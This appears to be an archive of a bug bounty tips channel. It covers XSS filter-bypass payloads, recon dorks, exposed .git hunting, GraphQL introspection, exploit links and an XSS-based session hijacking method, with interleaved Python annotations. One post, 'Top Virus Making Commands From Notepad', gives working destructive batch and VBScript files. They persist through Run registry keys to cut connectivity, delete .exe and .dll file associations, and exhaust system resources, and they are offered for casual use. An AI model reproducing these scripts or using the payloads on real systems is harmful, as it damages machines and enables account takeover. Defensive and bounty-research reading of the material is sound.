Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5,816 subscribers

Posts archive

Bug Bounty Tip: XSS WAF bypass with multi-character HTML entities. &fjlig; decodes to fj, &nvgt; decodes to > followed by U+20D2 (COMBINING LONG VERTICAL LINE OVERLAY), and &nvlt; decodes to < followed by U+20D2. A filter that inspects the raw, undecoded request never sees the angle bracket; the HTML parser produces it only after decoding. Cheers!
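The decoding behaviour behind this tip, as an added example that is not part of the original post: Python's html.unescape() carries the same HTML5 named-entity table a browser uses, so it shows exactly what &fjlig;, &nvgt; and &nvlt; turn into, and why a rule that matches angle brackets on the raw parameter value disagrees with a rule that matches after decoding and after dropping the combining mark. The sample payload is constructed. Whether the decoded characters land in an executable context depends on where the application places them, which the tip does not discuss.

```python
# Added example (not from the original tip): how the three multi-character HTML5
# named entities decode, and why a filter that matches on the raw request misses
# the angle bracket that the browser's HTML parser will produce.
import html
import unicodedata

COMBINING_LONG_VERTICAL_LINE_OVERLAY = "\u20d2"

# Expected decoding per the HTML5 named character reference table;
# html.unescape() is generated from the same table.
MULTI_CHAR_ENTITIES = {
    "&fjlig;": "fj",
    "&nvgt;": ">" + COMBINING_LONG_VERTICAL_LINE_OVERLAY,
    "&nvlt;": "<" + COMBINING_LONG_VERTICAL_LINE_OVERLAY,
}


def decode(raw: str) -> str:
    """Decode named character references the way an HTML parser does."""
    return html.unescape(raw)


def strip_combining_marks(text: str) -> str:
    """Drop combining marks (Unicode categories Mn/Mc/Me), e.g. U+20D2, keeping base characters."""
    return "".join(ch for ch in text if not unicodedata.category(ch).startswith("M"))


def naive_filter_blocks(raw: str) -> bool:
    """A request-level rule that looks for angle brackets in the undecoded input."""
    return "<" in raw or ">" in raw


def decoding_filter_blocks(raw: str) -> bool:
    """The same rule applied after entity decoding and combining-mark removal."""
    return naive_filter_blocks(strip_combining_marks(decode(raw)))


def entity_table_matches_stdlib() -> bool:
    """Sanity check: the hand-written table agrees with Python's HTML5 entity table."""
    return all(html.unescape(ent) == expected for ent, expected in MULTI_CHAR_ENTITIES.items())


if __name__ == "__main__":
    payload = "&nvlt;img src=x onerror=alert(1)&nvgt;"   # constructed sample input
    print("raw filter blocks it:", naive_filter_blocks(payload))          # False
    print("decoding filter blocks it:", decoding_filter_blocks(payload))  # True
    print(repr(decode(payload)))
```

The practical point for a defender is the last function: normalise (decode, then drop marks) before matching, or the rule and the browser disagree about what the bytes say.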

Three ways to call alert without the token alert appearing contiguously in the payload:
- (function(x){this[x+`ert`](1)})`al`
- window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
- document['default'+'View'][`\u0061lert`](3)
#XSS

60 BugBounty Dorks (replace example.com with the target's domain)
inurl:responsible-disclosure-policy inurl:/security ext:txt "contact"
0. inurl:responsible disclosure $1,000
1. site:.example.com inurl:security filetype:pdf
2. site:example.com intext:security intitle:report
3. intext:"bug bounty" site:example.com ext:doc
4. intitle:"bug bounty" site:example.com inurl:docs
5. site:example.com intext:"security policy"
6. site:example.com inurl:bug bounty ext:csv
7. site:example.com intext:disclosure inurl:policy
8. site:example.com intext:reward program intitle:"vulnerability"
9. site:example.com inurl:security intext:"reward" ext:xml
10. site:example.com intitle:"responsible disclosure" intext:reward -site:hackerone -site:bugcrowd
11. intext:"bug bounty" site:example.com inurl:archives
12. site:example.com intext:security ext:log
13. site:example.com inurl:disclosure ext:php
14. site:example.com intitle:"white hat program"
15. site:example.com inurl:security ext:json
16. site:example.com intext:"vulnerability report" intitle:"submit"
17. intext:"bug bounty" site:example.com intitle:"report"
18. site:example.com inurl:vulnerability intext:program filetype:json
19. site:example.com intext:responsible disclosure intitle:acknowledgement
20. site:example.com intext:"security concern" ext:html -inurl:blog
21. site:example.com inurl:bug inurl:bounty
22. site:example.com inurl:security intext:bounty
23. site:example.com inurl:security ext:txt
24. site:example.com inurl:responsible-disclosure
25. site:example.com inurl:/.well-known/security
26. site:example.com intext:bug bounty program
27. site:example.com intext:responsible disclosure program
28. site:example.com intext:vulnerability disclosure program
29. site:example.com intext:security rewards
30. site:example.com intext:bug bounty payout
31. site:example.com inurl:security ext:txt -inurl:hackerone -inurl:bugcrowd -inurl:synack
32. site:example.com inurl:responsible-disclosure -inurl:hackerone -inurl:bugcrowd -inurl:synack
33. site:example.com intext:bug bounty -inurl:hackerone -inurl:bugcrowd -inurl:synack
34. inurl:/security
35. inurl:/responsible-disclosure/ swag
36. inurl:'/responsible disclosure' hoodie
37. responsible disclosure hall of fame
38. inurl:responsible disclosure $50
39. responsible disclosure europe
40. responsible disclosure white hat
41. white hat program
42. responsible disclosure r=h:nl
43. responsible disclosure r=h:uk
44. responsible disclosure r=h:eu
45. responsible disclosure bounty r=h:nl
46. responsible disclosure bounty r=h:uk
47. responsible disclosure bounty r=h:eu
48. responsible disclosure swag r=h:nl
49. responsible disclosure swag r=h:uk
50. responsible disclosure swag r=h:eu
51. responsible disclosure reward r=h:nl
52. responsible disclosure reward r=h:uk
53. responsible disclosure reward r=h:eu
54. "powered by bugcrowd" -site:bugcrowd.com
55. "submit vulnerability report"
56. "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
57. intext:"we take security very seriously"
58. site:responsibledisclosure.com
59. inurl:'vulnerability-disclosure-policy' reward
60. site:..nl intext: security report reward

95% of hunters remove pics from their endpoint lists, but...
1. Gather all target endpoints.
2. Filter the results to image extensions only:
grep -Ei '\.(jpe?g|png)' endpoints.txt > results.txt
3. Filter to live URLs:
httpx -l results.txt -mc 200 -o alive.txt
4. Found a passport on a specific endpoint => app.com/xxxx/cdn/file/xxx.jpg
5. Visit app.com/xxxx/cdn/ ==> directory listing open, and the result is tons of PII
💡 Don't forget to check image files (jpg/jpeg/etc.) every time.
by @GodfatherOrwa #bugbountytips
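Step 5 above was done by hand: walk up from the image path and see whether a parent directory lists its contents. The following is an added example, not part of @GodfatherOrwa's tip, that automates that walk for every image URL in an endpoint list: it keeps image URLs, derives every ancestor directory (so app.com/xxxx/cdn/file/, then app.com/xxxx/cdn/, then app.com/xxxx/), and fetches each looking for autoindex markers. The endpoint lines and HTML bodies are constructed, and the listing markers are an assumption about common autoindex pages.

```python
# Added example (not part of @GodfatherOrwa's tip): derive every ancestor directory
# of each image URL in an endpoint list and test those directories for an open
# listing, the check step 5 does by hand. Endpoint lines and HTML bodies are
# constructed; the listing markers are an assumption about common autoindex pages.
import re
from urllib.parse import urlsplit, urlunsplit
from urllib.request import Request, urlopen

IMAGE_EXT = re.compile(r"\.(jpe?g|png)$", re.IGNORECASE)

# Markers emitted by common autoindex pages (nginx/Apache "Index of", Python http.server).
LISTING_MARKERS = (
    re.compile(r"<title>\s*Index of /", re.IGNORECASE),
    re.compile(r"<title>\s*Directory listing for /", re.IGNORECASE),
    re.compile(r">\s*Parent Directory\s*<", re.IGNORECASE),
)


def image_urls(lines) -> list:
    """Keep URLs whose path ends in an image extension (query string ignored)."""
    urls = (line.strip() for line in lines)
    return [u for u in urls if u and IMAGE_EXT.search(urlsplit(u).path)]


def parent_dirs(urls) -> list:
    """Every ancestor directory of each file URL, deepest first, deduplicated."""
    seen = []
    for url in urls:
        parts = urlsplit(url)
        segments = parts.path.split("/")[1:-1]       # directory names, file name dropped
        while segments:
            directory = "/" + "/".join(segments) + "/"
            dir_url = urlunsplit((parts.scheme, parts.netloc, directory, "", ""))
            if dir_url not in seen:
                seen.append(dir_url)
            segments.pop()
    return seen


def looks_like_listing(body: str) -> bool:
    """Heuristic: does this HTML body look like a directory index page?"""
    return any(m.search(body) for m in LISTING_MARKERS)


def _http_get(url: str) -> str:
    req = Request(url, headers={"User-Agent": "dir-listing-check"})
    with urlopen(req, timeout=10) as resp:
        return resp.read(200_000).decode("utf-8", "replace")


def find_open_listings(dir_urls, fetch=_http_get) -> list:
    """Fetch each directory URL and return the ones that appear to list their contents.
    `fetch` maps URL -> body so the network call can be replaced in tests."""
    found = []
    for url in dir_urls:
        try:
            if looks_like_listing(fetch(url)):
                found.append(url)
        except Exception:           # unreachable host, timeout, non-2xx: skip it
            continue
    return found


if __name__ == "__main__":
    # Constructed sample endpoint list, like the output of step 1 in the tip.
    sample = [
        "https://app.com/xxxx/cdn/file/a.jpg",
        "https://app.com/xxxx/cdn/file/b.PNG?v=2",
        "https://app.com/api/users",
    ]
    for d in parent_dirs(image_urls(sample)):
        print(d)
```

Feed it alive.txt from step 3 (one URL per line) and it prints every directory worth opening in a browser; a hit on any ancestor is the situation the tip describes.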

Mass hunting exposed .git with hednsextractor. Tools: hednsextractor + httpx + DotGit plugin
hednsextractor -target "target" -silent | httpx -path /.git/config -mc 200 -silent
#bugbountytips
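A 200 on /.git/config is not proof of an exposed repository: catch-all routes and SPA fallbacks return 200 for any path. The following is an added example, not part of the original post, that checks whether a body actually parses as a git config (a [core] section with repositoryformatversion) and then extracts the remote URLs, since a leaked config sometimes embeds credentials in the origin URL. The sample config is constructed for this example.

```python
# Added example (not part of the original post): tell a real exposed .git/config
# apart from a catch-all 200 page, and pull out remote URLs, which sometimes carry
# embedded credentials. The sample config below is constructed for this example.
import re
from urllib.parse import urlsplit

SECTION = re.compile(r'^\[([^\s\]"]+)(?:\s+"([^"]*)")?\]$')


def parse_git_config(text: str) -> dict:
    """Minimal parser for git's INI-like config: {"section" or "section.sub": {key: value}}.
    Written by hand because configparser treats git's tab-indented keys as continuations."""
    config, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION.match(line)
        if m:
            name, sub = m.group(1).lower(), m.group(2)
            current = f"{name}.{sub}" if sub is not None else name
            config.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = (s.strip() for s in line.split("=", 1))
            config[current][key.lower()] = value
    return config


def is_git_config(text: str) -> bool:
    """A genuine repository config has a [core] section with repositoryformatversion."""
    return "repositoryformatversion" in parse_git_config(text).get("core", {})


def remote_urls(text: str) -> dict:
    """Map remote name -> URL for every [remote "..."] section."""
    return {
        name.split(".", 1)[1]: values["url"]
        for name, values in parse_git_config(text).items()
        if name.startswith("remote.") and "url" in values
    }


def urls_with_credentials(text: str) -> list:
    """Remote URLs that embed a password or token (scheme://user:secret@host/...)."""
    return [u for u in remote_urls(text).values()
            if "://" in u and urlsplit(u).password is not None]


# Constructed sample: what a leaked .git/config with an embedded deploy token looks like.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
[remote "origin"]
\turl = https://deploy:s3cret@github.com/example/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
\tremote = origin
\tmerge = refs/heads/main
"""

if __name__ == "__main__":
    print(is_git_config(SAMPLE_CONFIG), remote_urls(SAMPLE_CONFIG))
```

On the command line the same false-positive cut can be made with httpx's -mr '^\[core\]' match-regex flag instead of -mc 200 alone.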

🐛💰 Bug Bounty Tips: Unlocking GraphQL's Hidden Potential 🌐
When it comes to GraphQL, it's easy to assume that every operation is reachable through the target app's visible functionality. Limiting your research to those operations means missing valuable attack surface. 😎 Here are the steps to expand your attack surface on GraphQL targets and gain an edge in finding and reporting security issues.
1️⃣ Identify GraphQL targets with the Nuclei detection template:
nuclei -u target.com -t graphql-detect.yaml
2️⃣ Retrieve the GraphQL schema to find hidden queries and mutations. If introspection is enabled, the following query returns the full schema, including operations the front end never calls:
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
3️⃣ Visualize with GraphQL Voyager: load the schema into graphql-voyager to navigate the types and relationships and plan your attack vector.
4️⃣ Retrieve hidden queries and mutations from JavaScript files when introspection is disabled. Bundled front-end code often contains operations the app's regular functionality never exposes; send them directly to the endpoint.
5️⃣ Craft your attack with the InQL scanner using the identified queries and mutations. These operations are often affected by IDOR, broken RBAC, race conditions, SQL injection and more. If you can't find more queries and mutations, don't worry: stay tuned for upcoming insights on brute-forcing and discovering hidden ones.
🔐 Takeaways: Don't hit a dead end with GraphQL apps. Dig deeper, find the concealed queries and mutations, and unlock functionality that can lead to significant bounties!
#bugbountytips #graphql
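Steps 2 and 4 produce raw material (an introspection JSON blob, or a JavaScript bundle) that still has to be turned into a list of operations to test. The following is an added example, not from the original post, that does both: it sends a shortened form of the step 2 introspection query, unwraps the nested ofType chain into readable signatures such as setRole(userIds: [ID!]!, role: String): Boolean, and regex-scans JavaScript for named operations when introspection is off. The sample schema is constructed; the network call is isolated in fetch_schema().

```python
# Added example (not from the original post): fetch the schema with the step 2
# introspection query and list every query/mutation with its argument types,
# plus a regex pass over JavaScript bundles for step 4. Network access is
# confined to fetch_schema(); the sample schema below is constructed for this example.
import json
import re
from urllib.request import Request, urlopen

# A shorter variant of the step 2 query: enough to enumerate operations and argument types.
INTROSPECTION_QUERY = (
    "{__schema{queryType{name}mutationType{name}subscriptionType{name}"
    "types{name fields(includeDeprecated:true){name args{name type{...T}}type{...T}}}}}"
    "fragment T on __Type{kind name ofType{kind name ofType{kind name ofType{kind name}}}}"
)


def fetch_schema(endpoint: str, headers=None) -> dict:
    """POST the introspection query and return the __schema object (network call)."""
    req = Request(endpoint, data=json.dumps({"query": INTROSPECTION_QUERY}).encode(),
                  method="POST", headers={"Content-Type": "application/json", **(headers or {})})
    with urlopen(req, timeout=15) as resp:
        return json.load(resp)["data"]["__schema"]


def type_name(ref: dict) -> str:
    """Unwrap the NON_NULL/LIST ofType chain into GraphQL syntax, e.g. [ID!]!."""
    kind = ref.get("kind")
    if kind == "NON_NULL":
        return type_name(ref["ofType"]) + "!"
    if kind == "LIST":
        return "[" + type_name(ref["ofType"]) + "]"
    return ref.get("name") or "?"


def list_operations(schema: dict) -> dict:
    """{"query": [signatures], "mutation": [...], "subscription": [...]}."""
    types = {t["name"]: t for t in schema.get("types", [])}
    ops = {}
    for kind in ("query", "mutation", "subscription"):
        root = schema.get(f"{kind}Type") or {}
        fields = (types.get(root.get("name")) or {}).get("fields") or []
        ops[kind] = [
            "{}({}): {}".format(
                f["name"],
                ", ".join(f"{a['name']}: {type_name(a['type'])}" for a in f.get("args") or []),
                type_name(f["type"]),
            )
            for f in fields
        ]
    return ops


OPERATION_RE = re.compile(r"\b(query|mutation|subscription)\s+([A-Za-z_]\w*)")


def operations_in_js(js_source: str) -> dict:
    """Step 4: named operations embedded in front-end JavaScript when introspection is off."""
    found = {"query": set(), "mutation": set(), "subscription": set()}
    for kind, name in OPERATION_RE.findall(js_source):
        found[kind].add(name)
    return {k: sorted(v) for k, v in found.items()}


# Constructed introspection result: one visible query and one mutation the UI never calls.
ID_NON_NULL = {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "ID"}}
SAMPLE_SCHEMA = {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"}, "subscriptionType": None,
    "types": [
        {"name": "Query", "fields": [
            {"name": "user", "args": [{"name": "id", "type": ID_NON_NULL}],
             "type": {"kind": "OBJECT", "name": "User"}},
        ]},
        {"name": "Mutation", "fields": [
            {"name": "setRole", "args": [
                {"name": "userIds", "type": {"kind": "NON_NULL", "name": None,
                                             "ofType": {"kind": "LIST", "name": None, "ofType": ID_NON_NULL}}},
                {"name": "role", "type": {"kind": "SCALAR", "name": "String"}},
            ], "type": {"kind": "SCALAR", "name": "Boolean"}},
        ]},
    ],
}

if __name__ == "__main__":
    for kind, sigs in list_operations(SAMPLE_SCHEMA).items():
        for sig in sigs:
            print(kind, sig)
```

The signature list is what you hand to InQL or to manual testing in step 5; a mutation like setRole that takes a list of IDs and a role string is exactly the kind of operation worth checking for broken RBAC.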

#exploit
1. CVE-2024-28397: js2py sandbox escape, bypass pyimport restriction https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape
2. Bringing process injection into view(s): exploiting all macOS apps using nib files https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files
3. CVE-2024-37079, CVE-2024-37080, CVE-2024-37081: VMware vCenter Server heap-overflow (RCE) https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a

Repost from 1N73LL1G3NC3
CVE-2024-28995: High-severity directory traversal vulnerability affecting SolarWinds Serv-U. SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow access to read sensitive files on the host machine. PoC: https://github.com/rapid7/metasploit-framework/pull/19255 Query:
Hunter: protocol.banner="Serv-U FTP"
FOFA: app="SolarWinds-Serv-U-FTP"
SHODAN: product:"Serv-U ftpd"


🦠 Top Virus Making Commands From Notepad 🦠
🟣 1. Disable Internet Permanently :-
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo You Have Been HACKED!
PAUSE
🃏 Action :- This writes a batch file that releases the machine's IP lease and registers it in both Run keys, so it runs at every logon. Connectivity stays down until the Run entries and the file are removed, so it is persistent rather than truly permanent.
🟣 2. Delete Key Registry Files :-
@ECHO OFF
START reg delete HKCR\.exe
START reg delete HKCR\.dll
START reg delete HKCR\*
:MESSAGE
ECHO Your PC has been crashed. Your Dad.
GOTO MESSAGE
🃏 Action :- This deletes the .exe and .dll file-type registry keys, then loops the message forever. This is dangerous and, without a backup, very hard to recover from.
🟣 3. Endless Notepads :-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
🃏 Action :- This opens Notepad windows in a loop until the computer runs out of resources and freezes.
🟣 4. Popping CD Drive :-
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
🃏 Action :- This keeps ejecting the CD tray (the second Eject call closes it again on most drives). This one is VBScript, so save it as .vbs, not .bat.
🟣 5. Endless Enter :-
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
🃏 Action :- This sends the Enter key every 100 ms. Also VBScript: save it as .vbs.
🔰 Save 1-3 with the extension .bat and 4-5 with the extension .vbs
⚠️ Note :- I am not responsible for any damage to your computer.
Want 50 reactions on this post, family 🫂

Guys, please tell me your thoughts on this. I am planning to start a video explanation of bug bounty hunting, so what are the things I need to change? Please let me know, guys.

Guys, check this out: a book summary app where you can start reading in your free time. I loved this app and I hope you love it too; if so, give it a reaction https://dsta.sh/mnA6TcBrYYingNzm7

Bug Bounty Hint: How to perform session hijacking with XSS + session fixation when the session cookie is HttpOnly
Steps:
1) Using JavaScript (the XSS), create a session cookie scoped to the /login path whose value is an unauthenticated session the attacker already holds.
2) Force the user to log out.
3) When the user logs back in, the login request carries the attacker's session and the server binds the authenticated user to it.
Details:
The attacker obtains a session cookie in another browser, then plants that value in the victim's browser. The existing HttpOnly cookie cannot be read or overwritten from JavaScript, but a second cookie with the same name can be set on a different path:
sess=aaaa; path=/login; expires=Mon, 17 Jun 2024 10:00:00 GMT
When the login form is submitted, the request contains both cookies. Browsers send cookies with a longer matching path first (RFC 6265), so the JavaScript-set cookie on /login precedes the HttpOnly cookie on /:
Cookie: sess=aaaa; sess=bbbb
Because the site has a session fixation bug, no new session is generated at login. With the name present twice, the server uses the first value, the attacker's sess=aaaa, and the logged-in user is attached to it. The final step is to use that session, which the attacker already holds in their own browser, for all actions on the site.
Cheers!
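The two mechanics this hint relies on, the browser's cookie ordering and the server's failure to rotate the session at login, as an added example that is not part of the original post. It models the Cookie header the way RFC 6265 serializes it (matching cookies, longest path first), shows a server that keeps the first sess value, and runs the scenario once against a login that promotes the presented session (vulnerable) and once against a login that issues a fresh id (the fix). Cookie names, values and paths are constructed.

```python
# Added example (not from the original hint): a small model of why the cookie
# planted on /login wins at login time, and of the server-side handling that makes
# the fixation exploitable, next to the fix. Cookie names, values and paths are constructed.
import secrets


def path_matches(request_path: str, cookie_path: str) -> bool:
    """RFC 6265 section 5.1.4 path-match."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def cookie_header(jar: list, request_path: str) -> str:
    """Serialize the Cookie header as a browser does: matching cookies, longer paths first
    (RFC 6265 section 5.4), so the /login cookie precedes the HttpOnly one on /."""
    matching = [c for c in jar if path_matches(request_path, c["path"])]
    matching.sort(key=lambda c: len(c["path"]), reverse=True)
    return "; ".join(f"{c['name']}={c['value']}" for c in matching)


def first_cookie(header: str, name: str):
    """Typical server behaviour for a duplicated cookie name: the first value wins."""
    for pair in header.split("; "):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


class SessionStore:
    """session id -> authenticated user (None while unauthenticated)."""

    def __init__(self):
        self.sessions = {}

    def new(self) -> str:
        sid = secrets.token_hex(8)
        self.sessions[sid] = None
        return sid

    def login_vulnerable(self, cookie_hdr: str, user: str) -> str:
        """Session fixation: authenticates whatever session id the request presented."""
        sid = first_cookie(cookie_hdr, "sess")
        self.sessions[sid] = user
        return sid

    def login_fixed(self, cookie_hdr: str, user: str) -> str:
        """Rotate the session id on login; the presented id is invalidated, not promoted."""
        self.sessions.pop(first_cookie(cookie_hdr, "sess"), None)
        sid = self.new()
        self.sessions[sid] = user
        return sid


def run_attack(login):
    """Replay the hint's scenario and report who the attacker's session is bound to."""
    store = SessionStore()
    attacker_sid = "aaaa"                      # obtained by the attacker in their own browser
    store.sessions[attacker_sid] = None
    victim_sid = "bbbb"
    store.sessions[victim_sid] = None
    jar = [
        {"name": "sess", "value": victim_sid, "path": "/", "httponly": True},
        {"name": "sess", "value": attacker_sid, "path": "/login", "httponly": False},  # set via XSS
    ]
    login(store, cookie_header(jar, "/login"), "victim")
    return store.sessions.get(attacker_sid)


if __name__ == "__main__":
    print("vulnerable login binds attacker's session to:", run_attack(SessionStore.login_vulnerable))
    print("fixed login binds attacker's session to:", run_attack(SessionStore.login_fixed))
```

The fix is the usual one: regenerate the session identifier on every authentication or privilege change, so a value the client chose never becomes an authenticated session, regardless of how it got into the Cookie header.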


Arjun + kxss: find parameters, then test them for XSS reflection
arjun -q -u target -oT arjun.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun.txt | kxss
#bugbountytips #bugbounty
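What the pipeline above does, as an added example that is not the original one-liner: the per-parameter split the awk command performs, the canary-wrapped probe value kxss sends, and the check on each response for which of < > " ' ` came back without output encoding. The canary and the sample response bodies are constructed.

```python
# Added example (not the original one-liner): the same per-parameter URL split
# the awk command performs, plus the check kxss then makes on each response:
# which special characters come back unencoded. Canary and sample bodies are constructed.
import re
from urllib.parse import parse_qsl, quote, urlsplit, urlunsplit

SPECIAL = '<>"\'`'   # characters whose unencoded reflection makes a parameter interesting


def one_url_per_param(url: str) -> list:
    """'https://t/p?a=1&b=2' -> ['https://t/p?a=', 'https://t/p?b='] (duplicate names collapsed)."""
    parts = urlsplit(url)
    names = dict.fromkeys(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
    base = urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))
    return [f"{base}?{name}=" for name in names]


def probe_url(param_url: str, canary: str) -> str:
    """Append the canary-wrapped special characters to a 'base?name=' URL."""
    return param_url + quote(canary + SPECIAL + canary, safe="")


def reflected_specials(body: str, canary: str) -> str:
    """Special characters that appear unencoded between the two canaries in the response."""
    m = re.search(re.escape(canary) + r"(.*?)" + re.escape(canary), body, re.DOTALL)
    if not m:
        return ""
    return "".join(ch for ch in SPECIAL if ch in m.group(1))


def interesting(body: str, canary: str) -> bool:
    """kxss-style verdict: at least one of < > \" ' ` survived output encoding."""
    return bool(reflected_specials(body, canary))


if __name__ == "__main__":
    for u in one_url_per_param("https://target/search?q=1&page=2"):
        print(probe_url(u, "kx7"))
    # Constructed response: the app encodes < and > but leaves quotes alone.
    body = '<input value="kx7&lt;&gt;"\'`kx7">'
    print(reflected_specials(body, "kx7"))   # "'`
```

A result like "'` inside an attribute value is the signal to stop scanning and look at the context by hand: an unencoded double quote in a double-quoted attribute is enough to break out of it.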